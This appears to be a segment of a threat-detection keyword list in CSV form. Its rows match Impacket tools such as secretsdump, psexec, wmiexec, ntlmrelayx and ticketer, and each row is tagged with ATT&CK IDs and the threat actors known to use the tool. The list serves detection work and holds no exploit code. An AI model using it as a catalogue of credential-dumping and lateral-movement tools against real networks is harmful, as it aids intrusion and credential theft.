"*impacket-getST*",".{0,1000}impacket\-getST.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48291"
"*impacket-getTGT*",".{0,1000}impacket\-getTGT.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48292"
"*impacketldap_shell*",".{0,1000}impacketldap_shell.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48293"
"*impacketlogger*",".{0,1000}impacketlogger.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48294"
"*impacket-lookupsid*",".{0,1000}impacket\-lookupsid.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48295"
"*impacketmssqlshell*",".{0,1000}impacketmssqlshell.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48296"
"*impacket-netview*",".{0,1000}impacket\-netview.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48297"
"*impacketntlmrelayx*",".{0,1000}impacketntlmrelayx.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48298"
"*impacketos_ident*",".{0,1000}impacketos_ident.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48299"
"*impacket-psexec*",".{0,1000}impacket\-psexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48300"
"*impacket-reg*",".{0,1000}impacket\-reg.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48301"
"*impacket-reg*",".{0,1000}impacket\-reg.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","N/A","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48302"
"*impacketremcomsvc*",".{0,1000}impacketremcomsvc.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48303"
"*impacketrpcdatabase*",".{0,1000}impacketrpcdatabase.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48304"
"*impacket-rpcdump*",".{0,1000}impacket\-rpcdump.{0,1000}","offensive_tool_keyword","adcshunter","Uses rpcdump to locate the ADCS server and identify if ESC8 is vulnerable from unauthenticated perspective.","T1018 - T1087 - T1046 - T1201 - T1595","TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/danti1988/adcshunter","1","0","N/A","N/A","7","1","80","7","2024-09-13T12:50:50Z","2023-12-14T14:31:05Z","48305"
"*impacket-rpcdump*",".{0,1000}impacket\-rpcdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48306"
"*impacket-samrdump*",".{0,1000}impacket\-samrdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48307"
"*impacketsecretsdump*",".{0,1000}impacketsecretsdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48308"
"*impacket-secretsdump*",".{0,1000}impacket\-secretsdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","48309"
"*impacket-secretsdump*",".{0,1000}impacket\-secretsdump.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48310"
"*impacketserviceinstall*",".{0,1000}impacketserviceinstall.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48311"
"*impacket-services*",".{0,1000}impacket\-services.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48312"
"*impacketsmbclient*",".{0,1000}impacketsmbclient.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48313"
"*impacket-smbclient*",".{0,1000}impacket\-smbclient.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48314"
"*impacket-smbserver*",".{0,1000}impacket\-smbserver.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48315"
"*impacket-ticketer*",".{0,1000}impacket\-ticketer.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48316"
"*impacketutils*",".{0,1000}impacketutils.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48317"
"*impacket-wmiexec*",".{0,1000}impacket\-wmiexec.{0,1000}","offensive_tool_keyword","AD exploitation cheat sheet","Command execution with WMI From Linux","T1550 - T1555 - T1212 - T1558","N/A","N/A","Black Basta","Exploitation tool","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","1","#linux","N/A","N/A","N/A","N/A","N/A","N/A","N/A","48318"
"*impacket-wmiexec*",".{0,1000}impacket\-wmiexec.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself. Packets can be constructed from scratch. as well as parsed from raw data. and the object oriented API makes it simple to work with deep hierarchies of protocols. The library provides a set of tools as examples of what can be done within the context of this library","T1071.001 - T1071.002 - T1071.004 - T1071.005 ","TA0005 - TA0006","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/SecureAuthCorp/impacket","1","1","N/A","N/A","N/A","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","48319"
